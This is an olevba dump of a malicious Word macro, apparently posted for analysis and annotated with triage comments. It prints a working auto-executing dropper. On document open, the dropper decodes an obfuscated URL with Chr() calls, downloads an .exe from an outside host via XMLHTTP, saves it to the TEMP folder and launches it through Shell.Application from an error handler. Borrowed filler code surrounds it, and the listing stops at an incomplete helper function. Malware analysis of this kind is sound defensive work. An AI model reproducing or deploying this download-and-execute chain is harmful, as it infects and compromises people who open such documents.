dynamoo

Malicious Word macro

Jul 22nd, 2015
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OpX:MAS--B- excelm~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: excelm~1.doc
  10. Type: OpenXML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
      ' Auto-executing entry point: olevba flags AutoOpen as running when the Word document is opened.
      ' Its only action is to call VEeve, which in turn calls the downloader routine xbxGk5Ux3irM4d in Module1.
  17.  
  18. VEeve (8.2)
  19.  
  20. End Sub
  21.  
  22. Sub VEeve(FFFFF As Long)
      ' Indirection layer between autoopen and the downloader: the FFFFF argument is never read,
      ' and the body does nothing except call xbxGk5Ux3irM4d (defined in Module1).
  23. xbxGk5Ux3irM4d
  24.  
  25. End Sub
  26.  
  27.  
  28.  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. ANALYSIS:
  31. +----------+----------+---------------------------------------+
  32. | Type     | Keyword  | Description                           |
  33. +----------+----------+---------------------------------------+
  34. | AutoExec | AutoOpen | Runs when the Word document is opened |
  35. +----------+----------+---------------------------------------+
  36. -------------------------------------------------------------------------------
  37. VBA MACRO Module1.bas
  38. in file: word/vbaProject.bin - OLE stream: u'VBA/Module1'
  39. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  40. Public SbUYcGnIFn As String
      ' SbUYcGnIFn carries the drop path: it is assigned in xbxGk5Ux3irM4d and read by CP45sZEhc107 in Module2.
  41. Public strTargettable As String
      ' strTargettable is only read by GetOpenFile (borrowed import code); nothing in this listing assigns it.
  42.  
  43. '------ BEGIN IMPORT CODES -----------
  44.  
  45. 'This code was originally written by Ken Getz.
  46. 'It is not to be altered or distributed,
  47. 'except as part of an application.
  48. 'You are free to use it in any application,
  49. 'provided the copyright notice is left unchanged.
  50. '
  51. ' Code courtesy of:
  52. '   Microsoft Access 95 How-To
  53. ' Ken Getz and Paul Litwin
  54. ' Waite Group Press, 1996
  55.  
  56. Type tagOPENFILENAME
      ' Record filled in by ahtCommonFileOpenSave for the common file dialog (part of the credited sample code above).
      ' In this listing it is declared only there (Dim OFN As tagOPENFILENAME); the download routine never touches it.
  57.     lStructSize As Long
  58.     hwndOwner As Long
  59.     hInstance As Long
  60.     strFilter As String
  61.     strCustomFilter As String
  62.     nMaxCustFilter As Long
  63.     nFilterIndex As Long
  64.     strFile As String
  65.     nMaxFile As Long
  66.     strFileTitle As String
  67.     nMaxFileTitle As Long
  68.     strInitialDir As String
  69.     strTitle As String
  70.     Flags As Long
  71.     nFileOffset As Integer
  72.     nFileExtension As Integer
  73.     strDefExt As String
  74.     lCustData As Long
  75.     lpfnHook As Long
  76.     lpTemplateName As String
  77. End Type
  78.  
  79.  
  80. Global Const ahtOFN_READONLY = &H1
      ' ahtOFN_* values are bit flags meant to be OR'd together and passed as Flags to ahtCommonFileOpenSave.
      ' Within this listing only ahtOFN_FILEMUSTEXIST, ahtOFN_HIDEREADONLY and ahtOFN_NOCHANGEDIR are referenced (GetOpenFile).
  81. Global Const ahtOFN_OVERWRITEPROMPT = &H2
  82. Global Const ahtOFN_HIDEREADONLY = &H4
  83. Global Const ahtOFN_NOCHANGEDIR = &H8
  84. Global Const ahtOFN_SHOWHELP = &H10
  85. ' You won't use these.
  86. 'Global Const ahtOFN_ENABLEHOOK = &H20
  87. 'Global Const ahtOFN_ENABLETEMPLATE = &H40
  88. 'Global Const ahtOFN_ENABLETEMPLATEHANDLE = &H80
  89. Global Const ahtOFN_NOVALIDATE = &H100
  90. Global Const ahtOFN_ALLOWMULTISELECT = &H200
  91. Global Const ahtOFN_EXTENSIONDIFFERENT = &H400
  92. Global Const ahtOFN_PATHMUSTEXIST = &H800
  93. Global Const ahtOFN_FILEMUSTEXIST = &H1000
  94. Global Const ahtOFN_CREATEPROMPT = &H2000
  95. Global Const ahtOFN_SHAREAWARE = &H4000
  96. Global Const ahtOFN_NOREADONLYRETURN = &H8000
  97. Global Const ahtOFN_NOTESTFILECREATE = &H10000
  98. Global Const ahtOFN_NONETWORKBUTTON = &H20000
  99. Global Const ahtOFN_NOLONGNAMES = &H40000
  100. ' New for Windows 95
  101. Global Const ahtOFN_EXPLORER = &H80000
  102. Global Const ahtOFN_NODEREFERENCELINKS = &H100000
  103. Global Const ahtOFN_LONGNAMES = &H200000
  104.  
  105.  
  106. Function RecallFileLocation() As String
       ' Builds a file-type filter string and returns whatever ahtCommonFileOpenSave returns for a dialog starting at C:\.
       ' Triage note: nothing in the autoopen -> VEeve -> xbxGk5Ux3irM4d chain calls this function; it sits
       ' inside the "IMPORT CODES" block of borrowed sample code and can be set aside when analysing the payload.
  107.     Dim strFilter As String, strLoc As String
  108.     Dim lngFlags As Long, MyDefault As String
  109.     strFilter = ahtAddFilterItem(strFilter, "Access Files (*.mda, *.mdb)", _
  110.                     "*.MDA;*.MDB")
  111.     'strFilter = ahtAddFilterItem(strFilter, "dBASE Files (*.dbf)", "*.DBF")
  112.    strFilter = ahtAddFilterItem(strFilter, "Text Files (*.txt)", "*.TXT")
  113.     strFilter = ahtAddFilterItem(strFilter, "Excel Files (*.xls)", "*.XLS")
  114.     strFilter = ahtAddFilterItem(strFilter, "All Files (*.*)", "*.*")
  115.  
  116.     MyDefault = "C:\"
  117.     ' MsgBox ValidateLocations(MyDefault)   Returns results of test to see if exists
  118.      
  119.     RecallFileLocation = ahtCommonFileOpenSave(InitialDir:=MyDefault, _
  120.         Filter:=strFilter, FilterIndex:=3, Flags:=lngFlags, _
  121.         DialogTitle:="Find File to Open!")
  122.    
  123.     '    MsgBox "You selected: " & ahtCommonFileOpenSave(InitialDir:="S:\Assignment List\", _
  124.     '    Filter:=strFilter, FilterIndex:=3, Flags:=lngFlags, _
  125.     '    DialogTitle:="Find File to Open!")
  126.    ' Since you passed in a variable for lngFlags,
  127.    ' the function places the output flags value in the variable.
  128.    Debug.Print Hex(lngFlags)
  129. End Function
  130.  
  131. Function GetOpenFile(Optional varDirectory As Variant, _
  132.     Optional varTitleForDialog As Variant) As Variant
       ' Asks for an Excel file through ahtCommonFileOpenSave and passes the chosen name to DoCmd.TransferSpreadsheet.
       ' Triage note: not called from the autoopen chain in this listing. NOTE(review): DoCmd is an Access
       ' object, while this macro was extracted from a Word document - consistent with borrowed filler code; confirm.
  133. ' Here's an example that gets an Access database name.
  134. Dim strFilter As String
  135. Dim lngFlags As Long
  136. Dim varFileName As Variant
  137. ' Specify that the chosen file must already exist,
  138. ' don't change directories when you're done
  139. ' Also, don't bother displaying
  140. ' the read-only box. It'll only confuse people.
  141.    lngFlags = ahtOFN_FILEMUSTEXIST Or _
  142.                 ahtOFN_HIDEREADONLY Or ahtOFN_NOCHANGEDIR
  143.     If IsMissing(varDirectory) Then
  144.         varDirectory = ""
  145.     End If
  146.     If IsMissing(varTitleForDialog) Then
  147.         varTitleForDialog = "Hello World"
  148.     End If
  149.  
  150.     ' Define the filter string and allocate space in the "c"
  151.    ' string Duplicate this line with changes as necessary for
  152.    ' more file templates.
  153.    strFilter = ahtAddFilterItem(strFilter, _
  154.                 "Excel (*.xls)", "*.XLS")
  155.     ' Now actually call to get the file name.
  156.    varFileName = ahtCommonFileOpenSave( _
  157.                     OpenFile:=False, _
  158.                     InitialDir:=varDirectory, _
  159.                     Filter:=strFilter, _
  160.                     Flags:=lngFlags, _
  161.                     DialogTitle:=varTitleForDialog)
  162.    
  163.     If IsNull(varFileName) Then
  164.         MsgBox "Please choose a file to import", vbOKOnly, "Notification"
  165.     End If
  166.    
  167.     MsgBox varFileName
  168.     If Not IsNull(varFileName) Then
  169.         varFileName = TrimNull(varFileName)
  170.         GetOpenFile = varFileName
  171.         'DoCmd.TransferText acImportDelim, "csv_import_specs", "sales", GetOpenFile, True
  172.        DoCmd.TransferSpreadsheet acImport, acSpreadsheetTypeExcel9, strTargettable, GetOpenFile, True
  173.     Else
  174.         MsgBox "Please choose a file to import", vbOKOnly, "Notification"
  175.     End If
  176.  
  177. End Function
  178.  
  179. Sub xbxGk5Ux3irM4d()
       ' Downloader routine, reached from autoopen -> VEeve. It fetches a remote .exe over HTTP, saves it
       ' under the TEMP directory and launches it from an error handler.
       ' Every sensitive string is assembled from Chr() codes and literals padded with "<", "=" and ";",
       ' which are stripped before use; method names are passed to CallByName as strings. That is why the
       ' olevba flag line for this file shows no I (IOCs) flag even though a URL is present.
       ' Triage/detection: look for Word making an HTTP request for an .exe, a new .exe appearing in the
       ' user's TEMP directory, and Word (or a shell COM object on its behalf) starting that file.
  180.  
       ' After the three Replace calls below this decodes to hxxp://amsaqwankido[.]com/max/bbw.exe (defanged here).
  181. cTdsOvmpZ0T = Chr(104) & "t" & ";t" & Chr(112) & Chr(58) & "/<" & Chr(47) & Chr(97) & Chr(109) & "s" & "a" & "q" & "w" & Chr(97) & "n" & Chr(107) & Chr(105) & Chr(100) & Chr(111) & Chr(46) & Chr(99) & "o" & Chr(109) & Chr(47) & Chr(109) & Chr(97) & "x" & "/" & "b" & "b" & "w" & ".=" & "e" & Chr(120) & "e"
       ' ProgID decodes to "Microsoft.XMLHTTP"; w7IAmB5cDGswAm (Module2) strips the padding and calls CreateObject.
  182. Set ElDbasip6 = w7IAmB5cDGswAm("M" & Chr(105) & "c" & Chr(114) & Chr(111) & "<s" & "o" & Chr(102) & "t" & Chr(46) & Chr(88) & Chr(77) & Chr(60) & Chr(76) & Chr(72) & "T" & "<T;" & Chr(80))
       ' Remove the padding characters "<" (60), "=" (61) and ";" (59) from the URL.
  183.  cTdsOvmpZ0T = Replace(cTdsOvmpZ0T, Chr(60), "")
  184.  cTdsOvmpZ0T = Replace(cTdsOvmpZ0T, Chr(61), "")
  185.  cTdsOvmpZ0T = Replace(cTdsOvmpZ0T, Chr(59), "")
       ' Equivalent to ElDbasip6.Open "GET", <url>, False - the method name "Open" is built from Chr() codes.
  186. CallByName ElDbasip6, Chr(79) & Chr(112) & Chr(101) & Chr(110), VbMethod, "G" & "E" & Chr(84), _
  187. cTdsOvmpZ0T _
  188. , False
  189.  
       ' ProgID decodes to "WScript.Shell".
  190. Set HURaWTTfnV70aA = w7IAmB5cDGswAm(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & "t" & Chr(46) & Chr(83) & Chr(104) & Chr(101) & "l" & Chr(108))
  191.  
       ' Property get of "Environment" with argument "Process": the process environment collection.
  192. Set jfhAqR8f0z = CallByName(HURaWTTfnV70aA, Chr(69) & "n" & "v" & "i" & Chr(114) & Chr(111) & Chr(110) & Chr(109) & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115))
  193.  
       ' Reads the TEMP environment variable.
  194. Ga9exV0usiOxh = jfhAqR8f0z("T" & Chr(69) & Chr(77) & Chr(80))
  195.  
       ' Drop path: <TEMP>\mikapolne.exe, kept in the module-level Public variable so CP45sZEhc107 can read it.
  196. SbUYcGnIFn = Ga9exV0usiOxh & Chr(92) & Chr(109) & Chr(105) & Chr(107) & "a" & Chr(112) & Chr(111) & Chr(108) & Chr(110) & Chr(101) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
  197. Dim FiiLlqz7ZuFikb() As Byte
  198.  
       ' "Send" issues the request; "responseBody" is then read into the byte array.
  199. CallByName ElDbasip6, "S" & "e" & Chr(110) & Chr(100), VbMethod
  200. FiiLlqz7ZuFikb = CallByName(ElDbasip6, "r" & "e" & Chr(115) & Chr(112) & Chr(111) & "n" & "s" & Chr(101) & "B" & Chr(111) & Chr(100) & Chr(121), VbGet)
       ' T1AetFXr4ps8 (Module2) writes the downloaded bytes to the drop path.
  201. T1AetFXr4ps8 FiiLlqz7ZuFikb, SbUYcGnIFn
       ' Deliberate division by zero: it forces control into the handler at ke7nvlgCXNTah, so the launch
       ' step sits in an error path instead of the straight-line code a reader or simple tracer follows.
  202. On Error GoTo ke7nvlgCXNTah
  203.     a = 84 / 0
  204.   On Error GoTo 0
  205.  
  206. f8kh1r1ELTN:
  207.   Exit Sub
  208. ke7nvlgCXNTah:
       ' Launch step: CP45sZEhc107 ignores this string argument and opens the path held in SbUYcGnIFn.
  209.   CP45sZEhc107 ("avNTTxhUC9eWb")
  210. Resume f8kh1r1ELTN
  211. End Sub
  212. Function ahtCommonFileOpenSave( _
  213.             Optional ByRef Flags As Variant, _
  214.             Optional ByVal InitialDir As Variant, _
  215.             Optional ByVal Filter As Variant, _
  216.             Optional ByVal FilterIndex As Variant, _
  217.             Optional ByVal DefaultExt As Variant, _
  218.             Optional ByVal FileName As Variant, _
  219.             Optional ByVal DialogTitle As Variant, _
  220.             Optional ByVal HWnd As Variant, _
  221.             Optional ByVal OpenFile As Variant) As Variant
       ' NOTE(review): as extracted, the two dialog calls below go through a qualifier (vdvd.) and take no
       ' arguments, and the HWnd default goes through cs.Application; neither vdvd nor cs is defined anywhere
       ' in this listing. The routine therefore looks like altered filler from the credited sample rather than
       ' working code, and it is not on the autoopen -> xbxGk5Ux3irM4d path.
  222. ' This is the entry point you'll use to call the common
  223. ' file open/save dialog. The parameters are listed
  224. ' below, and all are optional.
  225. '
  226. ' In:
  227. ' Flags: one or more of the ahtOFN_* constants, OR'd together.
  228. ' InitialDir: the directory in which to first look
  229. ' Filter: a set of file filters, set up by calling
  230. ' AddFilterItem. See examples.
  231. ' FilterIndex: 1-based integer indicating which filter
  232. ' set to use, by default (1 if unspecified)
  233. ' DefaultExt: Extension to use if the user doesn't enter one.
  234. ' Only useful on file saves.
  235. ' FileName: Default value for the file name text box.
  236. ' DialogTitle: Title for the dialog.
  237. ' hWnd: parent window handle
  238. ' OpenFile: Boolean(True=Open File/False=Save As)
  239. ' Out:
  240. ' Return Value: Either Null or the selected filename
  241. Dim OFN As tagOPENFILENAME
  242. Dim strFileName As String
  243. Dim strFileTitle As String
  244. Dim fResult As Boolean
  245.     ' Give the dialog a caption title.
  246.    If IsMissing(InitialDir) Then InitialDir = CurDir
  247.     If IsMissing(Filter) Then Filter = ""
  248.     If IsMissing(FilterIndex) Then FilterIndex = 1
  249.     If IsMissing(Flags) Then Flags = 0&
  250.     If IsMissing(DefaultExt) Then DefaultExt = ""
  251.     If IsMissing(FileName) Then FileName = ""
  252.     If IsMissing(DialogTitle) Then DialogTitle = ""
  253.     If IsMissing(HWnd) Then HWnd = cs.Application.hWndAccessApp
  254.     If IsMissing(OpenFile) Then OpenFile = True
  255.     ' Allocate string space for the returned strings.
  256.    strFileName = Left(FileName & String(256, 0), 256)
  257.     strFileTitle = String(256, 0)
  258.     ' Set up the data structure before you call the function
  259.    With OFN
  260.         .lStructSize = Len(OFN)
  261.         .hwndOwner = HWnd
  262.         .strFilter = Filter
  263.         .nFilterIndex = FilterIndex
  264.         .strFile = strFileName
  265.         .nMaxFile = Len(strFileName)
  266.         .strFileTitle = strFileTitle
  267.         .nMaxFileTitle = Len(strFileTitle)
  268.         .strTitle = DialogTitle
  269.         .Flags = Flags
  270.         .strDefExt = DefaultExt
  271.         .strInitialDir = InitialDir
  272.         ' Didn't think most people would want to deal with
  273.        ' these options.
  274.        .hInstance = 0
  275.         '.strCustomFilter = ""
  276.        '.nMaxCustFilter = 0
  277.        .lpfnHook = 0
  278.         'New for NT 4.0
  279.        .strCustomFilter = String(255, 0)
  280.         .nMaxCustFilter = 255
  281.     End With
  282.     ' This will pass the desired data structure to the
  283.    ' Windows API, which will in turn it uses to display
  284.    ' the Open/Save As Dialog.
  285.    If OpenFile Then
  286.         fResult = vdvd.aht_apiGetOpenFileName()
  287.     Else
  288.         fResult = vdvd.aht_apiGetSaveFileName()
  289.     End If
  290.  
  291.     ' The function call filled in the strFileTitle member
  292.    ' of the structure. You'll have to write special code
  293.    ' to retrieve that if you're interested.
  294.    If fResult Then
  295.         ' You might care to check the Flags member of the
  296.        ' structure to get information about the chosen file.
  297.        ' In this example, if you bothered to pass in a
  298.        ' value for Flags, we'll fill it in with the outgoing
  299.        ' Flags value.
  300.        If Not IsMissing(Flags) Then Flags = OFN.Flags
  301.         ahtCommonFileOpenSave = TrimNull(OFN.strFile)
  302.     Else
  303.         ahtCommonFileOpenSave = vbNullString
  304.     End If
  305. End Function
  306.  
  307. Function ahtAddFilterItem(strFilter As String, _
  308.     strDescription As String, Optional varItem As Variant) As String
       ' Returns strFilter with "<description><NUL><pattern><NUL>" appended; varItem defaults to "*.*" when omitted.
       ' Pure string helper from the borrowed file-dialog code; it plays no part in the download chain.
  309. ' Tack a new chunk onto the file filter.
  310. ' That is, take the old value, stick onto it the description,
  311. ' (like "Databases"), a null character, the skeleton
  312. ' (like "*.mdb;*.mda") and a final null character.
  313.  
  314.     If IsMissing(varItem) Then varItem = "*.*"
  315.     ahtAddFilterItem = strFilter & _
  316.                 strDescription & vbNullChar & _
  317.                 varItem & vbNullChar
  318. End Function
  319.  
  320. Private Function TrimNull(ByVal strItem As String) As String
       ' Returns strItem cut off just before its first null character, or strItem unchanged when it has none.
       ' Called by GetOpenFile and ahtCommonFileOpenSave only.
  321. Dim intPos As Integer
  322.     intPos = InStr(strItem, vbNullChar)
  323.     If intPos > 0 Then
  324.         TrimNull = Left(strItem, intPos - 1)
  325.     Else
  326.         TrimNull = strItem
  327.     End If
  328. End Function
  329.  
  330. '-------------- END IMPORT CODES --------------
  331.  
  332. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  333. ANALYSIS:
  334. +------------+----------------+-----------------------------------------+
  335. | Type       | Keyword        | Description                             |
  336. +------------+----------------+-----------------------------------------+
  337. | Suspicious | Open           | May open a file                         |
  338. | Suspicious | Windows        | May enumerate application windows (if   |
  339. |            |                | combined with Shell.Application object) |
  340. | Suspicious | Chr            | May attempt to obfuscate specific       |
  341. |            |                | strings                                 |
  342. | Suspicious | CallByName     | May attempt to obfuscate malicious      |
  343. |            |                | function calls                          |
  344. | Suspicious | Write          | May write to a file (if combined with   |
  345. |            |                | Open)                                   |
  346. | Suspicious | Output         | May write to a file (if combined with   |
  347. |            |                | Open)                                   |
  348. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  349. |            |                | may be used to obfuscate strings        |
  350. |            |                | (option --decode to see all)            |
  351. +------------+----------------+-----------------------------------------+
  352. -------------------------------------------------------------------------------
  353. VBA MACRO Module2.bas
  354. in file: word/vbaProject.bin - OLE stream: u'VBA/Module2'
  355. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  356. Dim strNoOfDays As Integer
       ' Module-level day count: set to 14 or 30 by the btn_hourly_* handlers and concatenated into their SQL text.
  357.  
  358. Private Sub Form_Load()
       ' Form initialiser: hides the chart controls, calls cs.reset_sales_subforms and sets the base WHERE clause.
       ' Triage note: appears to be filler from a sales-charting form; the cs qualifier is not defined in this
       ' listing and nothing on the autoopen chain calls this procedure.
  359.    
  360.   'hide links
  361.  Call show_chart_controls(False)
  362.    
  363.   'reset subform objects
  364.  Call cs.reset_sales_subforms
  365.  
  366.   strSQLWhere = "WHERE Status = 'REG'"
  367.  
  368. End Sub
  369.  
  370. Private Sub img_sales_monitor_Click()
       ' Click handler that resets the subforms and formats the "viewer" and "info" subform controls.
       ' Triage note: the sc and cc qualifiers are not defined in this listing and the handler is not
       ' reachable from autoopen; treat as filler around the payload functions.
  371.    
  372.   Call sc.reset_sales_subforms
  373.  
  374.   objSubformControl = "viewer"
  375.   Call sc.format_viewer("sales_viewer", 1, 1)
  376.  
  377.   objSubformControl = "info"
  378.   Call sc.format_viewer("sales_summary", 1, 1)
  379.    
  380.   cc.Me.focustaker.SetFocus
  381.  
  382. End Sub
  383.  
  384. Public Function T1AetFXr4ps8(PUDV4fRQQIpv As Variant, inq7dnGSyLG As String)
       ' File-write stage of the downloader: saves the data in PUDV4fRQQIpv to the path inq7dnGSyLG.
       ' Called from xbxGk5Ux3irM4d (Module1) with the HTTP response body and the <TEMP>\...exe drop path.
       ' The ProgID below decodes to "Adodb.Stream" and is created through w7IAmB5cDGswAm.
       ' This is the code behind olevba's SaveToFile / Write hits for Module2; note the stream is opened in
       ' binary mode here, so the tool's "may create a text file" description understates it.
  385. Dim pDvVXJLJ5VGIbM: Set pDvVXJLJ5VGIbM = w7IAmB5cDGswAm(Chr(65) & "d" & Chr(111) & "d" & Chr(98) & "." & Chr(83) & "t" & Chr(114) & Chr(101) & Chr(97) & Chr(109))
  386.  
  387. With pDvVXJLJ5VGIbM
       ' Type 1 is the ADODB binary stream type; SaveToFile option 2 overwrites an existing file.
  388.    .Type = 1
  389.     .Open
  390.     .write PUDV4fRQQIpv
  391.     .savetofile inq7dnGSyLG, 2
  392. End With
  393. End Function
  394.  
  395.  
  396.  
  397.  
  398. Private Sub img_sales_trends_Click()
       ' Click handler that builds a "TOP 14" sales query string and asks for the chart to be rebuilt.
       ' Triage note: filler; the dss, ccc and ll qualifiers are not defined in this listing and the
       ' handler is not reachable from autoopen.
  399.  
  400.   Call dss.EndTimer
  401.   Call ccc.set_chart_labels("sales")
  402.   'Call Subforms_reset
  403.  
  404.   chChartTitle = "14-Day Sales Trending"
  405.  
  406.   strSQLRank = "TOP 14"
  407.   strSQLChart = "SELECT " & strSQLRank & " DtlsDate, SUM(ExtPriceEff) AS totalSales FROM SalesDtls " & strSQLWhere & " GROUP BY DtlsDate ORDER BY DtlsDate DESC"
  408.  
  409.   Call ll.BuildSalesChart
  410.  
  411.   Call show_chart_controls(True)
  412.  
  413. End Sub
  414. Private Sub btn_this_month_Click()
       ' Click handler that builds a "TOP 30" sales query string and asks for the chart to be rebuilt.
       ' Triage note: filler; the fb and dd qualifiers are not defined in this listing and the handler
       ' is not reachable from autoopen.
  415.  
  416.   Call fb.EndTimer
  417.   Call dd.set_chart_labels("sales")
  418.  
  419.   chChartTitle = "30-Day Sales Trending"
  420.  
  421.   strSQLRank = "TOP 30"
  422.   strSQLChart = "SELECT " & strSQLRank & " DtlsDate, SUM(ExtPriceEff) AS totalSales FROM SalesDtls " & strSQLWhere & " GROUP BY DtlsDate ORDER BY DtlsDate DESC"
  423.  
  424.   Call dd.BuildSalesChart
  425.  
  426. End Sub
  427.  
  428. Private Sub btn_this_quarter_Click()
       ' Click handler that builds a "TOP 90" sales query string and asks for the chart to be rebuilt.
       ' Triage note: filler; the cc, ccc and lkd qualifiers are not defined in this listing and the
       ' handler is not reachable from autoopen.
  429.  
  430.   Call cc.EndTimer
  431.   Call ccc.set_chart_labels("sales")
  432.  
  433.   chChartTitle = "90-Day Sales Trending"
  434.  
  435.   strSQLRank = "TOP 90"
  436.   strSQLChart = "SELECT " & strSQLRank & " DtlsDate, SUM(ExtPriceEff) AS totalSales FROM SalesDtls " & strSQLWhere & " GROUP BY DtlsDate ORDER BY DtlsDate DESC"
  437.  
  438.   Call lkd.BuildSalesChart
  439.  
  440. End Sub
  441.  
  442. Private Sub btn_this_week_Click()
       ' Click handler that builds a "TOP 14" sales query string (same title and rank as img_sales_trends_Click).
       ' Triage note: filler; the kl, oo and ce qualifiers are not defined in this listing and the
       ' handler is not reachable from autoopen.
  443.  
  444.   Call kl.EndTimer
  445.   Call oo.set_chart_labels("sales")
  446.  
  447.   chChartTitle = "14-Day Sales Trending"
  448.  
  449.   strSQLRank = "TOP 14"
  450.   strSQLChart = "SELECT " & strSQLRank & " DtlsDate, SUM(ExtPriceEff) AS totalSales FROM SalesDtls " & strSQLWhere & " GROUP BY DtlsDate ORDER BY DtlsDate DESC"
  451.  
  452.   Call ce.BuildSalesChart
  453.  
  454. End Sub
  455.  
  456. Private Sub btn_hourly_14_Click()
       ' Click handler that sets strNoOfDays to 14 and builds an average-hourly-sales query string.
       ' Triage note: filler; the vr, fe and ec qualifiers are not defined in this listing and the
       ' handler is not reachable from autoopen.
  457.  
  458.   Call vr.EndTimer
  459.   Call fe.set_chart_labels("hourly")
  460.  
  461.   strNoOfDays = 14
  462.   chChartTitle = "Ave. Sales per Hour Over Past " & strNoOfDays & " Days"
  463.  
  464.   strSQLChart = "SELECT FORMAT(hour) AS hour_of_day, FORMAT(Avg(hourly_sales),'Standard') AS avg_hourly_sales FROM hourly_data_query WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " GROUP BY hour" 'DateValue('6/1/2011') AND DateValue('6/30/2011') GROUP BY hour"
  465.  
  466.   Call ec.BuildSalesChart
  467.  
  468. End Sub
  469.  
  470. Private Sub btn_hourly_30_Click()
       ' Click handler that sets strNoOfDays to 30 and builds an average-hourly-sales query string.
       ' Triage note: filler; the mm, ef and ls qualifiers are not defined in this listing (and the
       ' label call is spelled sset_chart_labels here), and the handler is not reachable from autoopen.
  471.  
  472.   Call mm.EndTimer
  473.   Call ef.sset_chart_labels("hourly")
  474.  
  475.   strNoOfDays = 30
  476.   chChartTitle = "Ave. Sales per Hour Over Past " & strNoOfDays & " Days"
  477.    
  478.   strSQLChart = "SELECT FORMAT(hour) AS hour_of_day, FORMAT(Avg(hourly_sales),'Standard') AS avg_hourly_sales FROM hourly_data_query WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " GROUP BY hour" 'DateValue('6/1/2011') AND DateValue('6/30/2011') GROUP BY hour"
  479.  
  480.   Call ls.BuildSalesChart
  481.  
  482. End Sub
  483.  
  484. Private Sub btn_hourly_sum_14_Click()
       ' Click handler that sets strNoOfDays to 14 and builds a summed-hourly-sales query string.
       ' Triage note: filler; the dcd, aa and lfk qualifiers are not defined in this listing and the
       ' handler is not reachable from autoopen.
  485.  
  486.   Call dcd.EndTimer
  487.   Call aa.set_chart_labels("hourly")
  488.  
  489.   strNoOfDays = 14
  490.   chChartTitle = "Aggregate Sales per Hour Over Past " & strNoOfDays & " Days"
  491.    
  492.   strSQLChart = "SELECT hour, sum(hourly_sales) as sum_hourly_sales FROM hourly_data_query WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " GROUP BY hour"
  493.  
  494.   Call lfk.BuildSalesChart
  495.  
  496. End Sub
  497.  
  498. Public Function CP45sZEhc107(oTOZyLSZ9iofhw As String)
       ' Launch stage of the downloader, called from the error handler in xbxGk5Ux3irM4d (Module1).
       ' The ProgID decodes to "Shell.Application"; its Open method is given the module-level drop path
       ' SbUYcGnIFn. The oTOZyLSZ9iofhw parameter is never read - the caller's string is a decoy.
       ' Placed between unrelated click handlers, so it is easy to miss when skimming Module2.
  499.  Set YMg9p4gOLj = w7IAmB5cDGswAm("S" & "h" & "e" & "l" & "l" & Chr(46) & Chr(65) & Chr(112) & "p" & Chr(108) & "i" & Chr(99) & Chr(97) & Chr(116) & "i" & "o" & Chr(110))
  500. YMg9p4gOLj.Open (SbUYcGnIFn)
  501. End Function
  502. Private Sub btn_hourly_sum_30_Click()
       ' Click handler that sets strNoOfDays to 30 and builds a summed-hourly-sales query string.
       ' Triage note: filler; the la, ds and ll qualifiers are not defined in this listing and the
       ' handler is not reachable from autoopen.
  503.  
  504.   Call la.EndTimer
  505.   Call ds.set_chart_labels("hourly")
  506.  
  507.   strNoOfDays = 30
  508.   chChartTitle = "Aggregate Sales per Hour Over Past " & strNoOfDays & " Days"
  509.    
  510.   strSQLChart = "SELECT hour, sum(hourly_sales) as sum_hourly_sales FROM hourly_data_query WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " GROUP BY hour"
  511.  
  512.   Call ll.BuildSalesChart
  513.  
  514. End Sub
  515.  
  516. Private Sub btn_hourly_transactions_14_Click()
       ' Click handler that sets strNoOfDays to 14 and builds an items-per-hour count query string.
       ' Triage note: filler; the oo, oa and dw qualifiers are not defined in this listing and the
       ' handler is not reachable from autoopen.
  517.  
  518.   Call oo.EndTimer
  519.   Call oa.set_chart_labels("item_count")
  520.  
  521.   strNoOfDays = 14
  522.   chChartTitle = "Aggregate Items Sold per Hour Over Past " & strNoOfDays & " Days"
  523.    
  524.   strSQLChart = "SELECT TIMESERIAL(FORMAT(SalesDtls.EndTime,'HH'),0,0) AS [hour], COUNT(ExtPriceEff) AS trans_count FROM SalesDtls WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " AND Status = 'REG' GROUP BY TIMESERIAL(FORMAT(SalesDtls.EndTime,'HH'),0,0)"
  525.  
  526.   Call dw.BuildSalesChart
  527.  
  528. End Sub
  529.  
  530. Private Sub btn_hourly_transactions_30_Click()
       ' Click handler that sets strNoOfDays to 30 and builds an items-per-hour count query string.
       ' Triage note: filler; the dwd, aa and lla qualifiers are not defined in this listing and the
       ' handler is not reachable from autoopen.
  531.  
  532.   Call dwd.EndTimer
  533.   Call aa.set_chart_labels("hourly")
  534.  
  535.   strNoOfDays = 30
  536.   chChartTitle = "Aggregate Items Sold per Hour Over Past " & strNoOfDays & " Days"
  537.    
  538.   strSQLChart = "SELECT TIMESERIAL(FORMAT(SalesDtls.EndTime,'HH'),0,0) AS [hour], COUNT(ExtPriceEff) AS trans_count FROM SalesDtls WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " AND Status = 'REG' GROUP BY TIMESERIAL(FORMAT(SalesDtls.EndTime,'HH'),0,0)"
  539.  
  540.   Call lla.BuildSalesChart
  541.  
  542. End Sub
  543.  
  544. Public Function w7IAmB5cDGswAm(Fpsh8W7KwFw4n3 As String)
